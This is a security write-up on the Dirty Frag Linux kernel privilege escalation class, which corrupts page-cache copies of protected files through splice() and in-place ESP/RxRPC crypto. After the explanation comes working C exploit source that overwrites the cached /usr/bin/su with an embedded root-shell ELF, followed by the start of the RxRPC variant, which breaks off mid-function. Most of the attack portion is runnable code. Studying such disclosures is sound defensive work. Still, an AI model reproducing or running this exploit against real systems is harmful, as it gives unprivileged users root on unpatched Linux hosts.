Dirty Frag: A New Linux Page-Cache Privilege Escalation Class

dirty-frag-linux-kernel-lpe-page-cache

Executive Summary

Dirty Frag is a newly disclosed Linux kernel local privilege escalation vulnerability class that allows an unprivileged local user to obtain root privileges on many major Linux distributions. The issue was published by Hyunwoo Kim, also known as V4bel, and is described as a descendant of the same page-cache corruption family as Dirty Pipe and Copy Fail. Unlike many kernel exploitation techniques, Dirty Frag is not based on a fragile race condition. The researcher describes it as a deterministic logic bug with a high success rate and no required timing window.

At a high level, Dirty Frag abuses the interaction between Linux zero-copy I/O, splice(), struct sk_buff fragments, and in-place cryptographic operations. A page from a file that the attacker can only read is placed into a socket buffer fragment. Later, receiver-side kernel crypto code performs an in-place write on that fragment. Because the fragment still points to the page cache of a protected file, the kernel modifies the in-memory cached copy of that file, even though the attacker never had write permission to the file itself.

The chain combines two variants: xfrm-ESP Page-Cache Write and RxRPC Page-Cache Write. The first gives a powerful controlled 4-byte write primitive but depends on the ability to create user and network namespaces. The second does not require namespace creation, but depends on the availability of the rxrpc module. Chaining them gives broad coverage across major distributions.

Affected Systems

According to the public Dirty Frag repository, the xfrm-ESP variant has existed from Linux commit cac2661c53f3, dated January 17, 2017, up to current upstream at the time of disclosure. The RxRPC variant has existed from commit 2dc334f1a63a, dated June 2023, up to current upstream at the time of disclosure. The author therefore describes the effective vulnerability lifetime as roughly nine years for the broader chain.

The exploit was tested by the researcher on several modern distributions and kernels, including:

Ubuntu 24.04.4:          6.17.0-23-generic
RHEL 10.1:               6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed:     7.0.2-1-default
CentOS Stream 10:        6.12.0-224.el10.x86_64
AlmaLinux 10:            6.12.0-124.52.3.el10_1.x86_64
Fedora 44:               6.19.14-300.fc44.x86_64

These are the tested examples from the repository, not an exhaustive list. The practical exposure depends on kernel version, backported patches, loaded modules, namespace policy, AppArmor or SELinux policy, and whether rxrpc, ESP, and related networking paths are available.

As of May 8, 2026, public reporting described Dirty Frag as newly disclosed and not yet broadly patched by distributions. The upstream ESP-side patch had been merged into the netdev tree on May 7, while the RxRPC-side fix was still described in the write-up as submitted but not yet upstream. Administrators should verify vendor advisories rather than assuming their distribution kernel is fixed.

Why Dirty Frag Is Possible

The bug class is about broken ownership assumptions.

Linux uses the page cache to keep in-memory copies of file contents. If a normal user opens /usr/bin/su or /etc/passwd read-only, they should be able to read cached pages but never modify them. The kernel must preserve that rule even when pages flow through advanced subsystems such as pipes, sockets, scatter-gather lists, and crypto APIs.

Dirty Frag breaks this boundary through this pattern:

Read-only file page
        │
        │ splice()
        ▼
Pipe buffer references page-cache page
        │
        │ splice() to socket
        ▼
skb fragment points to the same page-cache page
        │
        │ receiver-side in-place crypto
        ▼
Kernel writes into skb frag
        │
        ▼
Page cache of protected file is modified in RAM

The core issue is not that in-place crypto exists. In-place crypto is a valid optimization when the kernel owns the destination buffer. The problem is that the destination buffer can still be a page-cache page that came from a read-only file and was planted into an skb fragment through zero-copy I/O. Once that happens, the crypto routine writes into memory it should have copied first.

Technical Diagram

+-------------------------+
| Unprivileged process    |
| opens file read-only    |
+-----------+-------------+
            |
            | splice(file -> pipe)
            v
+-------------------------+
| Pipe buffer             |
| references page cache   |
+-----------+-------------+
            |
            | splice(pipe -> socket)
            v
+-------------------------+
| struct sk_buff          |
| skb_shinfo(skb)->frags  |
| frag points to file page|
+-----------+-------------+
            |
            | kernel receive path
            v
+-------------------------+
| ESP / RxRPC crypto path |
| src == dst scatterlist  |
| in-place decrypt/write  |
+-----------+-------------+
            |
            v
+-------------------------+
| Page cache corrupted    |
| protected file appears  |
| modified in memory      |
+-------------------------+

Variant 1: xfrm-ESP Page-Cache Write

The first Dirty Frag variant lives in the IPsec ESP receive path. Before decrypting ESP payloads in place, the kernel should ensure that any non-linear skb data is copied into a private writable buffer. The relevant helper is skb_cow_data(), where COW means copy-on-write.

The problem is that the vulnerable esp_input() logic contains a path that skips this copy step for certain non-linear skb layouts. If the skb is not cloned and has no frag_list, the code can jump to skip_cow, even though skb_shinfo(skb)->frags may still contain externally pinned pages.

In the exploit strategy described by the author, the attacker uses splice() to place bytes from a protected file into the skb fragment. Then ESP processing invokes crypto_authenc_esn_decrypt() in a way that writes four bytes into the destination scatterlist. Since the source and destination scatterlists point to the same skb fragment, and the fragment points to a file page-cache page, the four-byte write lands inside the cached file content.

A key detail is that the written 4-byte value is attacker-controlled through the XFRM replay ESN state. The write-up explains that seq_hi is supplied through the XFRMA_REPLAY_ESN_VAL netlink attribute when the Security Association is registered. As a result, this variant gives control over both the target offset and the 4-byte value.

The original proof-of-concept uses this to corrupt the page cache of /usr/bin/su, replacing the beginning of the setuid-root executable in memory with a tiny root-shell ELF. The disk file is not permanently overwritten, but subsequent reads and executions see the modified cached page until the cache is dropped or the system is rebooted.

Variant 2: RxRPC Page-Cache Write

The second variant abuses RxRPC, specifically the RXKAD security path. In rxkad_verify_packet_1(), the kernel verifies a packet by performing an in-place pcbc(fcrypt) decrypt over the first 8 bytes of the RxRPC payload. The source and destination scatterlists are the same. If the payload is backed by an skb fragment that points to a page-cache page, the decrypt operation performs an 8-byte write directly into that page.

This variant is different from ESP because the attacker does not directly choose the final 8 bytes. The value written is the result of fcrypt_decrypt(C, K), where C is the current 8-byte ciphertext block and K is a session key controlled by the attacker through an RxRPC v1 token. The attacker can brute-force keys in user space until the decrypted output has the desired shape.

The public write-up describes targeting the first line of /etc/passwd. Instead of overwriting a full executable, the exploit changes the root entry so the password field becomes empty. On systems where PAM configuration accepts null passwords through pam_unix.so nullok, this can allow su to authenticate without a password and then start a root shell.

This variant is especially important because it does not require creating a user namespace. The write-up notes that it relies on APIs available to unprivileged users, including add_key(), socket(AF_RXRPC), socket(AF_ALG), splice(), and recvmsg().

How the Chain Covers Different Linux Environments

Dirty Frag is not just one bug. It is a chain designed to handle different distribution hardening choices.

The ESP variant is more powerful because it gives a direct 4-byte arbitrary store primitive. However, registering XFRM Security Associations requires CAP_NET_ADMIN, so the exploit tries to obtain that capability inside a new user and network namespace. Some distributions allow this by default, while others restrict unprivileged user namespaces.

Ubuntu can block unprivileged user namespace creation through AppArmor policy, which may stop the ESP route. But Ubuntu also commonly ships or loads rxrpc.ko, making the RxRPC fallback relevant. Conversely, RHEL-like systems may not ship rxrpc.ko by default, but may still permit the ESP path if namespaces are available.

The resulting logic is:

Try ESP path:
    user namespace + net namespace
    register XFRM SA
    splice protected file page into skb frag
    in-place ESP crypto writes into page cache
    execute modified cached /usr/bin/su

If ESP path fails:
    try RxRPC path
    register attacker-controlled RxRPC key
    splice /etc/passwd page into skb frag
    in-place RxRPC crypto writes into page cache
    use modified cached passwd entry

This is why the author calls it “Universal Linux LPE”: not because every single kernel build is guaranteed exploitable in the same way, but because the two primitives cover each other’s environmental blind spots across major distributions.

Exploit code:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef SOL_UDP
#define SOL_UDP 17
#endif

#define ENC_PORT         4500
#define SEQ_VAL          200
#define REPLAY_SEQ       100
#define TARGET_PATH      "/usr/bin/su"
#define PATCH_OFFSET     0              /* overwrite whole ELF starting at file[0] */
#define PAYLOAD_LEN      192            /* bytes of shell_elf to write (48 triggers) */
#define ENTRY_OFFSET     0x78           /* shellcode entry inside the new ELF */

/*
 * 192-byte minimal x86_64 root-shell ELF.
 *   _start at 0x400078:
 *     setgid(0); setuid(0); setgroups(0, NULL);
 *     execve("/bin/sh", NULL, ["TERM=xterm", NULL]);
 *   PT_LOAD covers 0xb8 bytes (the actual content) at vaddr 0x400000 R+X.
 *
 *   Setting TERM in the new shell's env silences the
 *   "tput: No value for $TERM" / "test: : integer expected" noise
 *   /etc/bash.bashrc and friends emit when TERM is unset.
 *
 * Code (from offset 0x78):
 *   31 ff               xor edi, edi
 *   31 f6               xor esi, esi
 *   31 c0               xor eax, eax
 *   b0 6a               mov al, 0x6a              ; setgid
 *   0f 05               syscall
 *   b0 69               mov al, 0x69              ; setuid
 *   0f 05               syscall
 *   b0 74               mov al, 0x74              ; setgroups
 *   0f 05               syscall
 *   6a 00               push 0                    ; envp[1] = NULL
 *   48 8d 05 12 00 00 00 lea rax, [rip+0x12]      ; rax = "TERM=xterm"
 *   50                  push rax                  ; envp[0]
 *   48 89 e2            mov rdx, rsp              ; rdx = envp
 *   48 8d 3d 12 00 00 00 lea rdi, [rip+0x12]      ; rdi = "/bin/sh"
 *   31 f6               xor esi, esi              ; rsi = NULL (argv)
 *   6a 3b 58            push 0x3b ; pop rax       ; rax = 59 (execve)
 *   0f 05               syscall                   ; execve("/bin/sh",NULL,envp)
 *   "TERM=xterm\0"      (offset 0xa5..0xaf)
 *   "/bin/sh\0"         (offset 0xb0..0xb7)
 */
static const uint8_t shell_elf[PAYLOAD_LEN] = {
	0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
	0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
	0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
	0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
	0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
};

extern int g_su_verbose;
int g_su_verbose = 0;
#define SLOG(fmt, ...) do { if (g_su_verbose) fprintf(stderr, "[su] " fmt "\n", ##__VA_ARGS__); } while (0)

static int write_proc(const char *path, const char *buf)
{
	int fd = open(path, O_WRONLY);
	if (fd < 0) return -1;
	int n = write(fd, buf, strlen(buf));
	close(fd);
	return n;
}

static void setup_userns_netns(void)
{
	uid_t real_uid = getuid();
	gid_t real_gid = getgid();
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
		SLOG("unshare: %s", strerror(errno));
		exit(1);
	}
	write_proc("/proc/self/setgroups", "deny");
	char map[64];
	snprintf(map, sizeof(map), "0 %u 1", real_uid);
	if (write_proc("/proc/self/uid_map", map) < 0) {
		SLOG("uid_map: %s", strerror(errno)); exit(1);
	}
	snprintf(map, sizeof(map), "0 %u 1", real_gid);
	if (write_proc("/proc/self/gid_map", map) < 0) {
		SLOG("gid_map: %s", strerror(errno)); exit(1);
	}
	int s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) { SLOG("socket: %s", strerror(errno)); exit(1); }
	struct ifreq ifr; memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
	if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { SLOG("SIOCGIFFLAGS: %s", strerror(errno)); exit(1); }
	ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
	if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { SLOG("SIOCSIFFLAGS: %s", strerror(errno)); exit(1); }
	close(s);
}

static void put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)
{
	struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));
	rta->rta_type = type;
	rta->rta_len  = RTA_LENGTH(len);
	memcpy(RTA_DATA(rta), data, len);
	nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

static int add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
	int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
	if (sk < 0) return -1;
	struct sockaddr_nl nl = { .nl_family = AF_NETLINK };
	if (bind(sk, (struct sockaddr*)&nl, sizeof(nl)) < 0) { close(sk); return -1; }

	char buf[4096] = {0};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	nlh->nlmsg_type  = XFRM_MSG_NEWSA;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	nlh->nlmsg_pid   = getpid();
	nlh->nlmsg_seq   = 1;
	nlh->nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

	struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
	xs->id.daddr.a4 = inet_addr("127.0.0.1");
	xs->id.spi      = htonl(spi);
	xs->id.proto    = IPPROTO_ESP;
	xs->saddr.a4    = inet_addr("127.0.0.1");
	xs->family      = AF_INET;
	xs->mode        = XFRM_MODE_TRANSPORT;
	xs->replay_window = 0;
	xs->reqid       = 0x1234;
	xs->flags       = XFRM_STATE_ESN;
	xs->lft.soft_byte_limit   = (uint64_t)-1;
	xs->lft.hard_byte_limit   = (uint64_t)-1;
	xs->lft.soft_packet_limit = (uint64_t)-1;
	xs->lft.hard_packet_limit = (uint64_t)-1;
	xs->sel.family  = AF_INET;
	xs->sel.prefixlen_d = 32;
	xs->sel.prefixlen_s = 32;
	xs->sel.daddr.a4 = inet_addr("127.0.0.1");
	xs->sel.saddr.a4 = inet_addr("127.0.0.1");

	{
		char alg_buf[sizeof(struct xfrm_algo_auth) + 32];
		memset(alg_buf, 0, sizeof(alg_buf));
		struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)alg_buf;
		strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name)-1);
		aa->alg_key_len   = 32 * 8;
		aa->alg_trunc_len = 128;
		memset(aa->alg_key, 0xAA, 32);
		put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf));
	}
	{
		char alg_buf[sizeof(struct xfrm_algo) + 16];
		memset(alg_buf, 0, sizeof(alg_buf));
		struct xfrm_algo *ea = (struct xfrm_algo *)alg_buf;
		strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name)-1);
		ea->alg_key_len = 16 * 8;
		memset(ea->alg_key, 0xBB, 16);
		put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf));
	}
	{
		struct xfrm_encap_tmpl enc;
		memset(&enc, 0, sizeof(enc));
		enc.encap_type  = UDP_ENCAP_ESPINUDP;
		enc.encap_sport = htons(ENC_PORT);
		enc.encap_dport = htons(ENC_PORT);
		enc.encap_oa.a4 = 0;
		put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));
	}
	{
		char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4];
		memset(esn_buf, 0, sizeof(esn_buf));
		struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esn_buf;
		esn->bmp_len       = 1;
		esn->oseq          = 0;
		esn->seq           = REPLAY_SEQ;
		esn->oseq_hi       = 0;
		esn->seq_hi        = patch_seqhi;
		esn->replay_window = 32;
		put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
	}

	if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }
	char rbuf[4096];
	int n = recv(sk, rbuf, sizeof(rbuf), 0);
	if (n < 0) { close(sk); return -1; }
	struct nlmsghdr *rh = (struct nlmsghdr *)rbuf;
	if (rh->nlmsg_type == NLMSG_ERROR) {
		struct nlmsgerr *e = NLMSG_DATA(rh);
		if (e->error) { close(sk); return -1; }
	}
	close(sk);
	return 0;
}

static int do_one_write(const char *path, off_t offset, uint32_t spi)
{
	int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
	if (sk_recv < 0) return -1;
	int one = 1;
	setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
	struct sockaddr_in sa_d = {
		.sin_family = AF_INET,
		.sin_port   = htons(ENC_PORT),
		.sin_addr   = { inet_addr("127.0.0.1") },
	};
	if (bind(sk_recv, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) {
		close(sk_recv); return -1;
	}
	int encap = UDP_ENCAP_ESPINUDP;
	if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
		close(sk_recv); return -1;
	}
	int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
	if (sk_send < 0) { close(sk_recv); return -1; }
	if (connect(sk_send, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) {
		close(sk_send); close(sk_recv); return -1;
	}
	int file_fd = open(path, O_RDONLY);
	if (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }

	int pfd[2];
	if (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }

	uint8_t hdr[24];
	*(uint32_t*)(hdr + 0) = htonl(spi);
	*(uint32_t*)(hdr + 4) = htonl(SEQ_VAL);
	memset(hdr + 8, 0xCC, 16);

	struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) };
	if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t)sizeof(hdr)) {
		close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1;
	}
	off_t off = offset;
	ssize_t s = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
	if (s != 16) {
		close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1;
	}
	s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
	/* still proceed regardless of splice rc — kernel may have already
	 * decrypted the page in the time between splice and recv */
	usleep(150 * 1000);

	close(file_fd); close(pfd[0]); close(pfd[1]);
	close(sk_send); close(sk_recv);
	return s == 40 ? 0 : -1;
}

static int verify_byte(const char *path, off_t offset, uint8_t want)
{
	int fd = open(path, O_RDONLY);
	if (fd < 0) return -1;
	uint8_t got;
	if (pread(fd, &got, 1, offset) != 1) { close(fd); return -1; }
	close(fd);
	return got == want ? 0 : -1;
}

static int corrupt_su(void)
{
	setup_userns_netns();
	usleep(100 * 1000);

	/* Install 40 xfrm SAs, one per 4-byte chunk.  Each carries the
	 * desired payload word in its seq_hi field. */
	for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
		uint32_t spi = 0xDEADBE10 + i;
		uint32_t seqhi =
			((uint32_t)shell_elf[i*4 + 0] << 24) |
			((uint32_t)shell_elf[i*4 + 1] << 16) |
			((uint32_t)shell_elf[i*4 + 2] <<  8) |
			((uint32_t)shell_elf[i*4 + 3]);
		if (add_xfrm_sa(spi, seqhi) < 0) {
			SLOG("add_xfrm_sa #%d failed", i);
			return -1;
		}
	}
	SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4);

	for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
		uint32_t spi = 0xDEADBE10 + i;
		off_t off = PATCH_OFFSET + i * 4;
		if (do_one_write(TARGET_PATH, off, spi) < 0) {
			SLOG("do_one_write #%d at off=0x%lx failed", i, (long)off);
			return -1;
		}
	}
	SLOG("wrote %d bytes to %s starting at 0x%x",
			PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET);
	return 0;
}

int su_lpe_main(int argc, char **argv)
{
	for (int i = 1; i < argc; i++) {
		if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose"))
			g_su_verbose = 1;
		else if (!strcmp(argv[i], "--corrupt-only"))
			; /* compat: this body always corrupts only */
	}
	if (getenv("DIRTYFRAG_VERBOSE")) g_su_verbose = 1;

	pid_t cpid = fork();
	if (cpid < 0) return 1;
	if (cpid == 0) {
		int rc = corrupt_su();
		_exit(rc == 0 ? 0 : 2);
	}
	int cstatus;
	waitpid(cpid, &cstatus, 0);
	if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) {
		SLOG("corruption stage failed (status=0x%x)", cstatus);
		return 1;
	}

	/* Sanity check: bytes at the embedded ELF entry (file offset 0x78
	 * after our overwrite) should be 0x31 0xff (xor edi, edi — first
	 * instruction of the new shellcode). */
	if (verify_byte(TARGET_PATH, ENTRY_OFFSET, 0x31) != 0 ||
			verify_byte(TARGET_PATH, ENTRY_OFFSET + 1, 0xff) != 0) {
		SLOG("post-write verify failed (target unchanged)");
		return 1;
	}
	SLOG("/usr/bin/su page-cache patched (entry 0x%x = shellcode)",
			ENTRY_OFFSET);
	return 0;
}
/*
 * rxrpc/rxkad LPE — uid=1000 → root
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <poll.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/rxrpc.h>
#include <linux/keyctl.h>
#include <linux/if_alg.h>
#include <net/if.h>
#include <termios.h>

#ifndef AF_RXRPC
#define AF_RXRPC 33
#endif
#ifndef PF_RXRPC
#define PF_RXRPC AF_RXRPC
#endif
#ifndef SOL_RXRPC
#define SOL_RXRPC 272
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef MSG_SPLICE_PAGES
#define MSG_SPLICE_PAGES 0x8000000
#endif

/* ---- rxrpc constants ---- */
#define RXRPC_PACKET_TYPE_DATA          1
#define RXRPC_PACKET_TYPE_ACK           2
#define RXRPC_PACKET_TYPE_ABORT         4
#define RXRPC_PACKET_TYPE_CHALLENGE     6
#define RXRPC_PACKET_TYPE_RESPONSE      7
#define RXRPC_CLIENT_INITIATED          0x01
#define RXRPC_REQUEST_ACK               0x02
#define RXRPC_LAST_PACKET               0x04
#define RXRPC_CHANNELMASK               3
#define RXRPC_CIDSHIFT                  2

struct rxrpc_wire_header {
	uint32_t epoch;
	uint32_t cid;
	uint32_t callNumber;
	uint32_t seq;
	uint32_t serial;
	uint8_t  type;
	uint8_t  flags;
	uint8_t  userStatus;
	uint8_t  securityIndex;
	uint16_t cksum;        /* big-endian on wire */
	uint16_t serviceId;
} __attribute__((packed));

struct rxkad_challenge {
	uint32_t version;
	uint32_t nonce;
	uint32_t min_level;
	uint32_t __padding;
} __attribute__((packed));

/* Attacker-chosen 8-byte session key used for the rxkad token.
 * Mutable because the LPE brute-force iterates over keys looking for
 * one that decrypts the file's UID field to a "0:" prefix. */
static uint8_t SESSION_KEY[8] = {
	0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08
};

#define LOG(fmt, ...) fprintf(stderr, "[+] " fmt "\n", ##__VA_ARGS__)
#define WARN(fmt, ...) fprintf(stderr, "[!] " fmt "\n", ##__VA_ARGS__)
#define DBG(fmt, ...) fprintf(stderr, "[.] " fmt "\n", ##__VA_ARGS__)

/* =================================================================== */
/* unshare + map setup                                                  */
/* =================================================================== */

static int write_file(const char *path, const char *fmt, ...)
{
	int fd = open(path, O_WRONLY);
	if (fd < 0) return -1;
	char buf[256]; va_list ap; va_start(ap, fmt);
	int n = vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap);
	int r = (int)write(fd, buf, n); close(fd);
	return r;
}

static int do_unshare_userns_netns(void)
{
	uid_t real_uid = getuid();
	gid_t real_gid = getgid();
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
		WARN("unshare(NEWUSER|NEWNET): %s", strerror(errno));
		return -1;
	}
	LOG("unshare(USER|NET) OK, real uid=%u", real_uid);
	write_file("/proc/self/setgroups", "deny");
	if (write_file("/proc/self/uid_map", "%u %u 1", real_uid, real_uid) < 0) {
		WARN("uid_map: %s", strerror(errno)); return -1;
	}
	if (write_file("/proc/self/gid_map", "%u %u 1", real_gid, real_gid) < 0) {
		WARN("gid_map: %s", strerror(errno)); return -1;
	}
	LOG("uid/gid identity-mapped %u/%u; gained CAP_NET_RAW within netns",
			real_uid, real_gid);

	/* ifup lo */
	int s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s >= 0) {
		struct ifreq ifr; memset(&ifr, 0, sizeof(ifr));
		strcpy(ifr.ifr_name, "lo");
		if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {
			ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
			if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0)
				WARN("SIOCSIFFLAGS lo: %s", strerror(errno));
			else
				LOG("lo brought UP in new netns");
		}
		close(s);
	}
	return 0;
}

/* =================================================================== */
/* rxrpc key (rxkad v1 token with attacker session key)                 */
/* =================================================================== */

static long key_add(const char *type, const char *desc,
		const void *payload, size_t plen, int ringid)
{
	return syscall(SYS_add_key, type, desc, payload, plen, ringid);
}

static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen)
{
	uint8_t *p = out;
	uint32_t now = (uint32_t)time(NULL);
	uint32_t expires = now + 86400;
	*(uint32_t *)p = htonl(0); p += 4;   /* flags */
	const char *cell = "evil";
	uint32_t clen = strlen(cell);
	*(uint32_t *)p = htonl(clen); p += 4;
	memcpy(p, cell, clen);
	uint32_t pad = (4 - (clen & 3)) & 3;
	memset(p + clen, 0, pad);
	p += clen + pad;
	*(uint32_t *)p = htonl(1); p += 4;   /* ntoken */
	uint8_t *toklen_p = p; p += 4;
	uint8_t *tokstart = p;
	*(uint32_t *)p = htonl(2); p += 4;   /* sec_ix = RXKAD */
	*(uint32_t *)p = htonl(0); p += 4;   /* vice_id */
	*(uint32_t *)p = htonl(1); p += 4;   /* kvno */
	memcpy(p, SESSION_KEY, 8); p += 8;   /* session_key K */
	*(uint32_t *)p = htonl(now); p += 4;
	*(uint32_t *)p = htonl(expires); p += 4;
	*(uint32_t *)p = htonl(1); p += 4;   /* primary_flag */
	*(uint32_t *)p = htonl(8); p += 4;   /* ticket_len */
	memset(p, 0xCC, 8); p += 8;          /* ticket */
	uint32_t toklen = (uint32_t)(p - tokstart);
	*(uint32_t *)toklen_p = htonl(toklen);
	if ((size_t)(p - out) > maxlen) { errno = E2BIG; return -1; }
	return (int)(p - out);
}

static long add_rxrpc_key(const char *desc)
{
	uint8_t buf[512];
	int n = build_rxrpc_v1_token(buf, sizeof(buf));
	if (n < 0) return -1;
	return key_add("rxrpc", desc, buf, n, KEY_SPEC_PROCESS_KEYRING);
}

/* =================================================================== */
/* AF_ALG pcbc(fcrypt) helpers                                          */
/* =================================================================== */

static int alg_open_pcbc_fcrypt(const uint8_t key[8])
{
	int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
	if (s < 0) { WARN("socket(AF_ALG): %s", strerror(errno)); return -1; }
	struct sockaddr_alg sa = { .salg_family = AF_ALG };
	strcpy((char *)sa.salg_type, "skcipher");
	strcpy((char *)sa.salg_name, "pcbc(fcrypt)");
	if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
		WARN("bind(AF_ALG pcbc(fcrypt)): %s", strerror(errno));
		close(s); return -1;
	}
	if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) {
		WARN("ALG_SET_KEY: %s", strerror(errno));
		close(s); return -1;
	}
	return s;
}

/* Encrypt-or-decrypt a 1+ block of data with a given IV. */
static int alg_op(int alg_s, int op, const uint8_t iv[8],
		const void *in, size_t inlen, void *out)
{
	int op_fd = accept(alg_s, NULL, NULL);
	if (op_fd < 0) { WARN("accept(AF_ALG): %s", strerror(errno)); return -1; }

	char cbuf[CMSG_SPACE(sizeof(int)) +
		CMSG_SPACE(sizeof(struct af_alg_iv) + 8)] = {0};
	struct msghdr msg = {0};
	msg.msg_control = cbuf;
	msg.msg_controllen = sizeof(cbuf);

	struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
	c->cmsg_level = SOL_ALG;
	c->cmsg_type = ALG_SET_OP;
	c->cmsg_len = CMSG_LEN(sizeof(int));
	*(int *)CMSG_DATA(c) = op;

	c = CMSG_NXTHDR(&msg, c);
	c->cmsg_level = SOL_ALG;
	c->cmsg_type = ALG_SET_IV;
	c->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + 8);
	struct af_alg_iv *aiv = (struct af_alg_iv *)CMSG_DATA(c);
	aiv->ivlen = 8;
	memcpy(aiv->iv, iv, 8);

	struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen };
	msg.msg_iov = &iov; msg.msg_iovlen = 1;

